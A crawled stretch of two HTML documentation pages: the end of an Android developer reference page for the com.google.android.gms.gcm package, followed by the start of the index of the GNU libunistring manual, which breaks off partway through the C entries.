</script> <script src="../../../../../../assets/js/docs.js?v=2" type="text/javascript"></script> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-5831155-1', 'android.com'); ga('create', 'UA-49880327-2', 'android.com', {'name': 'universal'}); // New tracker); ga('send', 'pageview'); ga('universal.send', 'pageview'); // Send page view for new tracker. </script> </head> <body class="gc-documentation develop"> <div id="doc-api-level" class="" style="display:none"></div> <a name="top"></a> <a name="top"></a> <!-- Header --> <div id="header-wrapper"> <div id="header"> <div class="wrap" id="header-wrap"> <div class="col-3 logo"> <a href="../../../../../../index.html"> <img src="../../../../../../assets/images/dac_logo.png" srcset="../../../../../../assets/images/dac_logo@2x.png 2x" width="123" height="25" alt="Android Developers" /> </a> <div class="btn-quicknav" id="btn-quicknav"> <a href="#" class="arrow-inactive">Quicknav</a> <a href="#" class="arrow-active">Quicknav</a> </div> </div> <ul class="nav-x col-9"> <li class="design"> <a href="../../../../../../design/index.html" zh-tw-lang="設計" zh-cn-lang="设计" ru-lang="Проектирование" ko-lang="디자인" ja-lang="設計" es-lang="Diseñar" >Design</a></li> <li class="develop"><a href="../../../../../../develop/index.html" zh-tw-lang="開發" zh-cn-lang="开发" ru-lang="Разработка" ko-lang="개발" ja-lang="開発" es-lang="Desarrollar" >Develop</a></li> <li class="distribute last"><a href="../../../../../../distribute/googleplay/index.html" zh-tw-lang="發佈" zh-cn-lang="分发" ru-lang="Распространение" ko-lang="배포" ja-lang="配布" es-lang="Distribuir" >Distribute</a></li> </ul> <div class="menu-container"> <div class="moremenu"> <div id="more-btn"></div> </div> <div class="morehover" id="moremenu"> <div class="top"></div> <div class="mid"> <div class="header">Links</div> <ul> <li><a href="https://play.google.com/apps/publish/" target="_googleplay">Google Play Developer Console</a></li> <li><a href="http://android-developers.blogspot.com/">Android Developers Blog</a></li> <li><a href="../../../../../../about/index.html">About Android</a></li> </ul> <div class="header">Android Sites</div> <ul> <li><a href="http://www.android.com">Android.com</a></li> <li class="active"><a>Android Developers</a></li> <li><a href="http://source.android.com">Android Open Source Project</a></li> </ul> <br class="clearfix" /> </div><!-- end 'mid' --> <div class="bottom"></div> </div><!-- end 'moremenu' --> <div class="search" id="search-container"> <div class="search-inner"> <div id="search-btn"></div> <div class="left"></div> <form onsubmit="return submit_search()"> <input id="search_autocomplete" type="text" value="" autocomplete="off" name="q" onfocus="search_focus_changed(this, true)" onblur="search_focus_changed(this, false)" onkeydown="return search_changed(event, true, '../../../../../../')" onkeyup="return search_changed(event, false, '../../../../../../')" /> </form> <div class="right"></div> <a class="close hide">close</a> <div class="left"></div> <div class="right"></div> </div><!-- end search-inner --> </div><!-- end search-container --> <div class="search_filtered_wrapper reference"> <div class="suggest-card reference no-display"> <ul class="search_filtered"> </ul> </div> </div> <div class="search_filtered_wrapper docs"> <div class="suggest-card dummy no-display">&nbsp;</div> <div class="suggest-card develop no-display"> <ul class="search_filtered"> </ul> <div class="child-card guides no-display"> </div> <div class="child-card training no-display"> </div> <div class="child-card samples no-display"> </div> </div> <div class="suggest-card design no-display"> <ul class="search_filtered"> </ul> </div> <div class="suggest-card distribute no-display"> <ul class="search_filtered"> </ul> </div> </div> </div><!-- end menu-container (search and menu widget) --> <!-- Expanded quicknav --> <div id="quicknav" class="col-13"> <ul> <li class="about"> <ul> <li><a href="../../../../../../about/index.html">About</a></li> <li><a href="../../../../../../wear/index.html">Wear</a></li> <li><a href="../../../../../../tv/index.html">TV</a></li> <li><a href="../../../../../../auto/index.html">Auto</a></li> </ul> </li> <li class="design"> <ul> <li><a href="../../../../../../design/index.html">Get Started</a></li> <li><a href="../../../../../../design/devices.html">Devices</a></li> <li><a href="../../../../../../design/style/index.html">Style</a></li> <li><a href="../../../../../../design/patterns/index.html">Patterns</a></li> <li><a href="../../../../../../design/building-blocks/index.html">Building Blocks</a></li> <li><a href="../../../../../../design/downloads/index.html">Downloads</a></li> <li><a href="../../../../../../design/videos/index.html">Videos</a></li> </ul> </li> <li class="develop"> <ul> <li><a href="../../../../../../training/index.html" zh-tw-lang="訓練課程" zh-cn-lang="培训" ru-lang="Курсы" ko-lang="교육" ja-lang="トレーニング" es-lang="Capacitación" >Training</a></li> <li><a href="../../../../../../guide/index.html" zh-tw-lang="API 指南" zh-cn-lang="API 指南" ru-lang="Руководства по API" ko-lang="API 가이드" ja-lang="API ガイド" es-lang="Guías de la API" >API Guides</a></li> <li><a href="../../../../../../reference/packages.html" zh-tw-lang="參考資源" zh-cn-lang="参考" ru-lang="Справочник" ko-lang="참조문서" ja-lang="リファレンス" es-lang="Referencia" >Reference</a></li> <li><a href="../../../../../../sdk/index.html" zh-tw-lang="相關工具" zh-cn-lang="工具" ru-lang="Инструменты" ko-lang="도구" ja-lang="ツール" es-lang="Herramientas" >Tools</a> </li> <li><a href="../../../../../../google/index.html">Google Services</a> </li> </ul> </li> <li class="distribute last"> <ul> <li><a href="../../../../../../distribute/googleplay/index.html">Google Play</a></li> <li><a href="../../../../../../distribute/essentials/index.html">Essentials</a></li> <li><a href="../../../../../../distribute/users/index.html">Get Users</a></li> <li><a href="../../../../../../distribute/engage/index.html">Engage &amp; Retain</a></li> <li><a href="../../../../../../distribute/monetize/index.html">Monetize</a></li> <li><a href="../../../../../../distribute/tools/index.html">Tools &amp; Reference</a></li> <li><a href="../../../../../../distribute/stories/index.html">Developer Stories</a></li> </ul> </li> </ul> </div><!-- /Expanded quicknav --> </div><!-- end header-wrap.wrap --> </div><!-- end header --> <!-- Secondary x-nav --> <div id="nav-x"> <div class="wrap"> <ul class="nav-x col-9 develop" style="width:100%"> <li class="training"><a href="../../../../../../training/index.html" zh-tw-lang="訓練課程" zh-cn-lang="培训" ru-lang="Курсы" ko-lang="교육" ja-lang="トレーニング" es-lang="Capacitación" >Training</a></li> <li class="guide"><a href="../../../../../../guide/index.html" zh-tw-lang="API 指南" zh-cn-lang="API 指南" ru-lang="Руководства по API" ko-lang="API 가이드" ja-lang="API ガイド" es-lang="Guías de la API" >API Guides</a></li> <li class="reference"><a href="../../../../../../reference/packages.html" zh-tw-lang="參考資源" zh-cn-lang="参考" ru-lang="Справочник" ko-lang="참조문서" ja-lang="リファレンス" es-lang="Referencia" >Reference</a></li> <li class="tools"><a href="../../../../../../sdk/index.html" zh-tw-lang="相關工具" zh-cn-lang="工具" ru-lang="Инструменты" ko-lang="도구" ja-lang="ツール" es-lang="Herramientas" >Tools</a></li> <li class="google"><a href="../../../../../../google/index.html" >Google Services</a> </li> </ul> </div> </div> <!-- /Sendondary x-nav DEVELOP --> <div id="searchResults" class="wrap" style="display:none;"> <h2 id="searchTitle">Results</h2> <div id="leftSearchControl" class="search-control">Loading...</div> </div> </div> <!--end header-wrapper --> <div id="sticky-header"> <div> <a class="logo" href="#top"></a> <a class="top" href="#top"></a> <ul class="breadcrumb"> <li class="current">com.google.android.gms.gcm</li> </ul> </div> </div> <div class="wrap clearfix" id="body-content"> <div class="col-4" id="side-nav" itemscope itemtype="http://schema.org/SiteNavigationElement"> <div id="devdoc-nav"> <div id="api-nav-header"> <div id="api-level-toggle"> <label for="apiLevelCheckbox" class="disabled" title="Select your target API level to dim unavailable APIs">API level: </label> <div class="select-wrapper"> <select id="apiLevelSelector"> <!-- option elements added by buildApiLevelSelector() --> </select> </div> </div><!-- end toggle --> <div id="api-nav-title">Android APIs</div> </div><!-- end nav header --> <script> var SINCE_DATA = [ ]; buildApiLevelSelector(); </script> <div id="swapper"> <div id="nav-panels"> <div id="resize-packages-nav"> <div id="packages-nav" class="scroll-pane"> <ul> <li class="api apilevel-"> <a href="../../../../../../reference/com/google/android/gms/package-summary.html">com.google.android.gms</a></li> <li class="api apilevel-"> <a href="../../../../../../reference/com/google/android/gms/actions/package-summary.html">com.google.android.gms.actions</a></li> <li class="api apilevel-"> <a href="../../../../../../reference/com/google/android/gms/ads/package-summary.html">com.google.android.gms.ads</a></li> <li class="api apilevel-"> <a href="../../../../../../reference/com/google/android/gms/ads/doubleclick/package-summary.html">com.google.android.gms.ads.doubleclick</a></li> <li class="api apilevel-"> <a href="../../../../../../reference/com/google/android/gms/ads/identifier/package-summary.html">com.google.android.gms.ads.identifier</a></li> <li class="api apilevel-"> <a href="../../../../../../reference/com/google/android/gms/ads/mediation/package-summary.html">com.google.android.gms.ads.mediation</a></li> <li class="api apilevel-"> <a href="../../../../../../reference/com/google/android/gms/ads/mediation/admob/package-summary.html">com.google.android.gms.ads.mediation.admob</a></li> <li class="api apilevel-"> <a href="../../../../../../reference/com/google/android/gms/ads/mediation/customevent/package-summary.html">com.google.android.gms.ads.mediation.customevent</a></li> <li class="api apilevel-"> <a href="../../../../../../reference/com/google/android/gms/ads/purchase/package-summary.html">com.google.android.gms.ads.purchase</a></li> <li class="api apilevel-"> <a href="../../../../../../reference/com/google/android/gms/ads/search/package-summary.html">com.google.android.gms.ads.search</a></li> <li class="api apilevel-"> <a href="../../../../../../reference/com/google/android/gms/analytics/package-summary.html">com.google.android.gms.analytics</a></li> <li class="api apilevel-"> <a href="../../../../../../reference/com/google/android/gms/analytics/ecommerce/package-summary.html">com.google.android.gms.analytics.ecommerce</a></li> <li class="api apilevel-"> <a href="../../../../../../reference/com/google/android/gms/appindexing/package-summary.html">com.google.android.gms.appindexing</a></li> <li class="api apilevel-"> <a href="../../../../../../reference/com/google/android/gms/appstate/package-summary.html">com.google.android.gms.appstate</a></li> <li class="api apilevel-"> <a href="../../../../../../reference/com/google/android/gms/auth/package-summary.html">com.google.android.gms.auth</a></li> <li class="api apilevel-"> <a href="../../../../../../reference/com/google/android/gms/auth/api/package-summary.html">com.google.android.gms.auth.api</a></li> <li class="api apilevel-"> <a href="../../../../../../reference/com/google/android/gms/cast/package-summary.html">com.google.android.gms.cast</a></li> <li class="api apilevel-"> <a href="../../../../../../reference/com/google/android/gms/common/package-summary.html">com.google.android.gms.common</a></li> <li class="api apilevel-"> <a href="../../../../../../reference/com/google/android/gms/common/annotation/package-summary.html">com.google.android.gms.common.annotation</a></li> <li class="api apilevel-"> <a href="../../../../../../reference/com/google/android/gms/common/api/package-summary.html">com.google.android.gms.common.api</a></li> <li class="api apilevel-"> <a href="../../../../../../reference/com/google/android/gms/common/data/package-summary.html">com.google.android.gms.common.data</a></li> <li class="api apilevel-"> <a href="../../../../../../reference/com/google/android/gms/common/images/package-summary.html">com.google.android.gms.common.images</a></li> <li class="api apilevel-"> <a href="../../../../../../reference/com/google/android/gms/drive/package-summary.html">com.google.android.gms.drive</a></li> <li class="api apilevel-"> <a href="../../../../../../reference/com/google/android/gms/drive/events/package-summary.html">com.google.android.gms.drive.events</a></li> <li class="api apilevel-"> <a href="../../../../../../reference/com/google/android/gms/drive/metadata/package-summary.html">com.google.android.gms.drive.metadata</a></li> <li class="api apilevel-"> <a href="../../../../../../reference/com/google/android/gms/drive/query/package-summary.html">com.google.android.gms.drive.query</a></li> <li class="api apilevel-"> <a href="../../../../../../reference/com/google/android/gms/drive/widget/package-summary.html">com.google.android.gms.drive.widget</a></li> <li class="api apilevel-"> <a href="../../../../../../reference/com/google/android/gms/fitness/package-summary.html">com.google.android.gms.fitness</a></li> <li class="api apilevel-"> <a href="../../../../../../reference/com/google/android/gms/fitness/data/package-summary.html">com.google.android.gms.fitness.data</a></li> <li class="api apilevel-"> <a href="../../../../../../reference/com/google/android/gms/fitness/request/package-summary.html">com.google.android.gms.fitness.request</a></li> <li class="api apilevel-"> <a href="../../../../../../reference/com/google/android/gms/fitness/result/package-summary.html">com.google.android.gms.fitness.result</a></li> <li class="api apilevel-"> <a href="../../../../../../reference/com/google/android/gms/fitness/service/package-summary.html">com.google.android.gms.fitness.service</a></li> <li class="api apilevel-"> <a href="../../../../../../reference/com/google/android/gms/games/package-summary.html">com.google.android.gms.games</a></li> <li class="api apilevel-"> <a href="../../../../../../reference/com/google/android/gms/games/achievement/package-summary.html">com.google.android.gms.games.achievement</a></li> <li class="api apilevel-"> <a href="../../../../../../reference/com/google/android/gms/games/event/package-summary.html">com.google.android.gms.games.event</a></li> <li class="api apilevel-"> <a href="../../../../../../reference/com/google/android/gms/games/leaderboard/package-summary.html">com.google.android.gms.games.leaderboard</a></li> <li class="api apilevel-"> <a href="../../../../../../reference/com/google/android/gms/games/multiplayer/package-summary.html">com.google.android.gms.games.multiplayer</a></li> <li class="api apilevel-"> <a href="../../../../../../reference/com/google/android/gms/games/multiplayer/realtime/package-summary.html">com.google.android.gms.games.multiplayer.realtime</a></li> <li class="api apilevel-"> <a href="../../../../../../reference/com/google/android/gms/games/multiplayer/turnbased/package-summary.html">com.google.android.gms.games.multiplayer.turnbased</a></li> <li class="api apilevel-"> <a href="../../../../../../reference/com/google/android/gms/games/quest/package-summary.html">com.google.android.gms.games.quest</a></li> <li class="api apilevel-"> <a href="../../../../../../reference/com/google/android/gms/games/request/package-summary.html">com.google.android.gms.games.request</a></li> <li class="api apilevel-"> <a href="../../../../../../reference/com/google/android/gms/games/snapshot/package-summary.html">com.google.android.gms.games.snapshot</a></li> <li class="selected api apilevel-"> <a href="../../../../../../reference/com/google/android/gms/gcm/package-summary.html">com.google.android.gms.gcm</a></li> <li class="api apilevel-"> <a href="../../../../../../reference/com/google/android/gms/identity/intents/package-summary.html">com.google.android.gms.identity.intents</a></li> <li class="api apilevel-"> <a href="../../../../../../reference/com/google/android/gms/identity/intents/model/package-summary.html">com.google.android.gms.identity.intents.model</a></li> <li class="api apilevel-"> <a href="../../../../../../reference/com/google/android/gms/location/package-summary.html">com.google.android.gms.location</a></li> <li class="api apilevel-"> <a href="../../../../../../reference/com/google/android/gms/maps/package-summary.html">com.google.android.gms.maps</a></li> <li class="api apilevel-"> <a href="../../../../../../reference/com/google/android/gms/maps/model/package-summary.html">com.google.android.gms.maps.model</a></li> <li class="api apilevel-"> <a href="../../../../../../reference/com/google/android/gms/panorama/package-summary.html">com.google.android.gms.panorama</a></li> <li class="api apilevel-"> <a href="../../../../../../reference/com/google/android/gms/plus/package-summary.html">com.google.android.gms.plus</a></li> <li class="api apilevel-"> <a href="../../../../../../reference/com/google/android/gms/plus/model/moments/package-summary.html">com.google.android.gms.plus.model.moments</a></li> <li class="api apilevel-"> <a href="../../../../../../reference/com/google/android/gms/plus/model/people/package-summary.html">com.google.android.gms.plus.model.people</a></li> <li class="api apilevel-"> <a href="../../../../../../reference/com/google/android/gms/security/package-summary.html">com.google.android.gms.security</a></li> <li class="api apilevel-"> <a href="../../../../../../reference/com/google/android/gms/tagmanager/package-summary.html">com.google.android.gms.tagmanager</a></li> <li class="api apilevel-"> <a href="../../../../../../reference/com/google/android/gms/wallet/package-summary.html">com.google.android.gms.wallet</a></li> <li class="api apilevel-"> <a href="../../../../../../reference/com/google/android/gms/wallet/fragment/package-summary.html">com.google.android.gms.wallet.fragment</a></li> <li class="api apilevel-"> <a href="../../../../../../reference/com/google/android/gms/wearable/package-summary.html">com.google.android.gms.wearable</a></li> </ul><br/> </div> <!-- end packages-nav --> </div> <!-- end resize-packages --> <div id="classes-nav" class="scroll-pane"> <ul> <li><h2>Classes</h2> <ul> <li class="api apilevel-"><a href="../../../../../../reference/com/google/android/gms/gcm/GoogleCloudMessaging.html">GoogleCloudMessaging</a></li> <li class="api apilevel-"><a href="../../../../../../reference/com/google/android/gms/gcm/Task.html">Task</a></li> </ul> </li> </ul><br/> </div><!-- end classes --> </div><!-- end nav-panels --> <div id="nav-tree" style="display:none" class="scroll-pane"> <div id="tree-list"></div> </div><!-- end nav-tree --> </div><!-- end swapper --> <div id="nav-swap"> <a class="fullscreen">fullscreen</a> <a href='#' onclick='swapNav();return false;'><span id='tree-link'>Use Tree Navigation</span><span id='panel-link' style='display:none'>Use Panel Navigation</span></a> </div> </div> <!-- end devdoc-nav --> </div> <!-- end side-nav --> <script type="text/javascript"> // init fullscreen based on user pref var fullscreen = readCookie("fullscreen"); if (fullscreen != 0) { if (fullscreen == "false") { toggleFullscreen(false); } else { toggleFullscreen(true); } } // init nav version for mobile if (isMobile) { swapNav(); // tree view should be used on mobile $('#nav-swap').hide(); } else { chooseDefaultNav(); if ($("#nav-tree").is(':visible')) { init_default_navtree("../../../../../../"); } } // scroll the selected page into view $(document).ready(function() { scrollIntoView("packages-nav"); scrollIntoView("classes-nav"); }); </script> <div class="col-12" id="doc-col"> <div id="api-info-block"> <div class="api-level"> </div> </div> <div id="jd-header"> package <h1>com.google.android.gms.gcm</h1> </div><!-- end header --> <div id="naMessage"></div> <div id="jd-content" class="api apilevel-"> <h2>Classes</h2> <div class="jd-sumtable"> <table class="jd-sumtable-expando"> <tr class="alt-color api apilevel-" > <td class="jd-linkcol"><a href="../../../../../../reference/com/google/android/gms/gcm/GoogleCloudMessaging.html">GoogleCloudMessaging</a></td> <td class="jd-descrcol" width="100%"><p>The class you use to write a GCM-enabled client application that runs on an Android device.&nbsp;</td> </tr> <tr class=" api apilevel-" > <td class="jd-linkcol"><a href="../../../../../../reference/com/google/android/gms/gcm/Task.html">Task</a></td> <td class="jd-descrcol" width="100%">Encapsulates the parameters of a task that you will schedule on the GcmNetworkManager.&nbsp;</td> </tr> </table> </div> <div id="footer" class="wrap" > <div id="copyright"> Except as noted, this content is licensed under <a href="http://www.apache.org/licenses/LICENSE-2.0">Apache 2.0</a>. For details and restrictions, see the <a href="../../../../../../license.html"> Content License</a>. </div> <div id="build_info"> Android GmsCore 1474901&nbsp;r &mdash; <script src="../../../../../../timestamp.js" type="text/javascript"></script> <script>document.write(BUILD_TIMESTAMP)</script> </div> <div id="footerlinks"> <p> <a href="../../../../../../about/index.html">About Android</a>&nbsp;&nbsp;|&nbsp; <a href="../../../../../../legal.html">Legal</a>&nbsp;&nbsp;|&nbsp; <a href="../../../../../../support.html">Support</a> </p> </div> </div> <!-- end footer --> </div><!-- end jd-content --> </div><!-- doc-content --> </div> <!-- end body-content --> </body> </html>
rootfs/usr/share/doc/libunistring/libunistring_19.html
PennartLoettring/Poettrix
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html401/loose.dtd"> <html> <!-- Created on September, 1 2014 by texi2html 1.78a --> <!-- Written by: Lionel Cons <Lionel.Cons@cern.ch> (original author) Karl Berry <karl@freefriends.org> Olaf Bachmann <obachman@mathematik.uni-kl.de> and many others. Maintained by: Many creative people. Send bugs and suggestions to <texi2html-bug@nongnu.org> --> <head> <title>GNU libunistring: Index</title> <meta name="description" content="GNU libunistring: Index"> <meta name="keywords" content="GNU libunistring: Index"> <meta name="resource-type" content="document"> <meta name="distribution" content="global"> <meta name="Generator" content="texi2html 1.78a"> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <style type="text/css"> <!-- a.summary-letter {text-decoration: none} pre.display {font-family: serif} pre.format {font-family: serif} pre.menu-comment {font-family: serif} pre.menu-preformatted {font-family: serif} pre.smalldisplay {font-family: serif; font-size: smaller} pre.smallexample {font-size: smaller} pre.smallformat {font-family: serif; font-size: smaller} pre.smalllisp {font-size: smaller} span.roman {font-family:serif; font-weight:normal;} span.sansserif {font-family:sans-serif; font-weight:normal;} ul.toc {list-style: none} --> </style> </head> <body lang="en" bgcolor="#FFFFFF" text="#000000" link="#0000FF" vlink="#800080" alink="#FF0000"> <table cellpadding="1" cellspacing="1" border="0"> <tr><td valign="middle" align="left">[<a href="libunistring_18.html#SEC68" title="Beginning of this chapter or previous chapter"> &lt;&lt; </a>]</td> <td valign="middle" align="left">[<a href="libunistring_20.html#INDEX0" title="Next chapter"> &gt;&gt; </a>]</td> <td valign="middle" align="left"> &nbsp; </td> <td valign="middle" align="left"> &nbsp; </td> <td valign="middle" align="left"> &nbsp; </td> <td valign="middle" align="left"> &nbsp; </td> <td valign="middle" align="left"> &nbsp; </td> <td valign="middle" align="left">[<a href="libunistring.html#SEC_Top" title="Cover (top) of document">Top</a>]</td> <td valign="middle" align="left">[<a href="libunistring.html#SEC_Contents" title="Table of contents">Contents</a>]</td> <td valign="middle" align="left">[<a href="#SEC77" title="Index">Index</a>]</td> <td valign="middle" align="left">[<a href="libunistring_abt.html#SEC_About" title="About (help)"> ? </a>]</td> </tr></table> <hr size="2"> <a name="Index"></a> <a name="SEC77"></a> <h1 class="unnumbered"> <a href="libunistring.html#TOC72">Index</a> </h1> <table><tr><th valign="top">Jump to: &nbsp; </th><td><a href="#SEC77_0" class="summary-letter"><b>A</b></a> &nbsp; <a href="#SEC77_1" class="summary-letter"><b>B</b></a> &nbsp; <a href="#SEC77_2" class="summary-letter"><b>C</b></a> &nbsp; <a href="#SEC77_3" class="summary-letter"><b>D</b></a> &nbsp; <a href="#SEC77_4" class="summary-letter"><b>E</b></a> &nbsp; <a href="#SEC77_5" class="summary-letter"><b>F</b></a> &nbsp; <a href="#SEC77_6" class="summary-letter"><b>G</b></a> &nbsp; <a href="#SEC77_7" class="summary-letter"><b>H</b></a> &nbsp; <a href="#SEC77_8" class="summary-letter"><b>I</b></a> &nbsp; <a href="#SEC77_9" class="summary-letter"><b>J</b></a> &nbsp; <a href="#SEC77_10" class="summary-letter"><b>L</b></a> &nbsp; <a href="#SEC77_11" class="summary-letter"><b>M</b></a> &nbsp; <a href="#SEC77_12" class="summary-letter"><b>N</b></a> &nbsp; <a href="#SEC77_13" class="summary-letter"><b>O</b></a> &nbsp; <a href="#SEC77_14" class="summary-letter"><b>P</b></a> &nbsp; <a href="#SEC77_15" class="summary-letter"><b>R</b></a> &nbsp; <a href="#SEC77_16" class="summary-letter"><b>S</b></a> &nbsp; <a href="#SEC77_17" class="summary-letter"><b>T</b></a> &nbsp; <a href="#SEC77_18" class="summary-letter"><b>U</b></a> &nbsp; <a href="libunistring_20.html#INDEX0_0" class="summary-letter"><b>V</b></a> &nbsp; <a href="libunistring_20.html#INDEX0_1" class="summary-letter"><b>W</b></a> &nbsp; </td></tr></table> <table border="0" class="index-cp"> <tr><td></td><th align="left">Index Entry</th><th align="left"> Section</th></tr> <tr><td colspan="3"> <hr></td></tr> <tr><th><a name="SEC77_0">A</a></th><td></td><td></td></tr> <tr><td></td><td valign="top"><a href="libunistring_9.html#IDX701">ambiguous width</a></td><td valign="top"><a href="libunistring_9.html#SEC40">9. Display width <code>&lt;uniwidth.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#SEC30">Arabic shaping</a></td><td valign="top"><a href="libunistring_8.html#SEC30">8.8 Arabic shaping</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_2.html#IDX14">argument conventions</a></td><td valign="top"><a href="libunistring_2.html#SEC9">2. Conventions</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_16.html#SEC65">autoconf macro</a></td><td valign="top"><a href="libunistring_16.html#SEC65">16.4 Autoconf macro</a></td></tr> <tr><td colspan="3"> <hr></td></tr> <tr><th><a name="SEC77_1">B</a></th><td></td><td></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#SEC25">bidi class</a></td><td valign="top"><a href="libunistring_8.html#SEC25">8.3 Bidi class</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#SEC25">bidirectional category</a></td><td valign="top"><a href="libunistring_8.html#SEC25">8.3 Bidi class</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_17.html#SEC67">bidirectional reordering</a></td><td valign="top"><a href="libunistring_17.html#SEC67">17. More advanced functionality</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#SEC37">block</a></td><td valign="top"><a href="libunistring_8.html#SEC37">8.11 Blocks</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_10.html#SEC41">boundaries, between grapheme clusters</a></td><td valign="top"><a href="libunistring_10.html#SEC41">10. Grapheme cluster breaks in strings <code>&lt;unigbrk.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_11.html#SEC44">boundaries, between words</a></td><td valign="top"><a href="libunistring_11.html#SEC44">11. Word breaks in strings <code>&lt;uniwbrk.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_10.html#SEC41">breaks, grapheme cluster</a></td><td valign="top"><a href="libunistring_10.html#SEC41">10. Grapheme cluster breaks in strings <code>&lt;unigbrk.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_12.html#SEC47">breaks, line</a></td><td valign="top"><a href="libunistring_12.html#SEC47">12. Line breaking <code>&lt;unilbrk.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_11.html#SEC44">breaks, word</a></td><td valign="top"><a href="libunistring_11.html#SEC44">11. Word breaks in strings <code>&lt;uniwbrk.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_16.html#SEC66">bug reports</a></td><td valign="top"><a href="libunistring_16.html#SEC66">16.5 Reporting problems</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_16.html#SEC66">bug tracker</a></td><td valign="top"><a href="libunistring_16.html#SEC66">16.5 Reporting problems</a></td></tr> <tr><td colspan="3"> <hr></td></tr> <tr><th><a name="SEC77_2">C</a></th><td></td><td></td></tr> <tr><td></td><td valign="top"><a href="libunistring_1.html#SEC6">C string functions</a></td><td valign="top"><a href="libunistring_1.html#SEC6">1.5 &lsquo;<samp>char *</samp>&rsquo; strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#SEC38">C, programming language</a></td><td valign="top"><a href="libunistring_8.html#SEC38">8.12 ISO C and Java syntax</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#SEC39">C-like API</a></td><td valign="top"><a href="libunistring_8.html#SEC39">8.13 Classifications like in ISO C</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#SEC24">canonical combining class</a></td><td valign="top"><a href="libunistring_8.html#SEC24">8.2 Canonical combining class</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#SEC59">case detection</a></td><td valign="top"><a href="libunistring_14.html#SEC59">14.5 Case detection</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#SEC56">case mappings</a></td><td valign="top"><a href="libunistring_14.html#SEC56">14.2 Case mappings of strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#IDX829"><code>casing_prefix_context_t</code></a></td><td valign="top"><a href="libunistring_14.html#SEC57">14.3 Case mappings of substrings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#IDX837"><code>casing_suffix_context_t</code></a></td><td valign="top"><a href="libunistring_14.html#SEC57">14.3 Case mappings of substrings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_1.html#IDX10">char, type</a></td><td valign="top"><a href="libunistring_1.html#SEC6">1.5 &lsquo;<samp>char *</samp>&rsquo; strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_13.html#SEC50">combining, Unicode characters</a></td><td valign="top"><a href="libunistring_13.html#SEC50">13.2 Composition of Unicode characters</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX54">comparing</a></td><td valign="top"><a href="libunistring_4.html#SEC14">4.3 Elementary string functions</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX110">comparing</a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#SEC58">comparing, ignoring case</a></td><td valign="top"><a href="libunistring_14.html#SEC58">14.4 Case insensitive comparison</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#IDX864">comparing, ignoring case, with collation rules</a></td><td valign="top"><a href="libunistring_14.html#SEC58">14.4 Case insensitive comparison</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_13.html#SEC52">comparing, ignoring normalization</a></td><td valign="top"><a href="libunistring_13.html#SEC52">13.4 Normalizing comparisons</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#SEC58">comparing, ignoring normalization and case</a></td><td valign="top"><a href="libunistring_14.html#SEC58">14.4 Case insensitive comparison</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#IDX866">comparing, ignoring normalization and case, with collation rules</a></td><td valign="top"><a href="libunistring_14.html#SEC58">14.4 Case insensitive comparison</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_13.html#IDX802">comparing, ignoring normalization, with collation rules</a></td><td valign="top"><a href="libunistring_13.html#SEC52">13.4 Normalizing comparisons</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX114">comparing, with collation rules</a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#IDX865">comparing, with collation rules, ignoring case</a></td><td valign="top"><a href="libunistring_14.html#SEC58">14.4 Case insensitive comparison</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_13.html#IDX803">comparing, with collation rules, ignoring normalization</a></td><td valign="top"><a href="libunistring_13.html#SEC52">13.4 Normalizing comparisons</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#IDX867">comparing, with collation rules, ignoring normalization and case</a></td><td valign="top"><a href="libunistring_14.html#SEC58">14.4 Case insensitive comparison</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_16.html#IDX892">compiler options</a></td><td valign="top"><a href="libunistring_16.html#SEC63">16.2 Compiler options</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_13.html#SEC50">composing, Unicode characters</a></td><td valign="top"><a href="libunistring_13.html#SEC50">13.2 Composition of Unicode characters</a></td></tr> <tr><td></td><td valign="top"><a 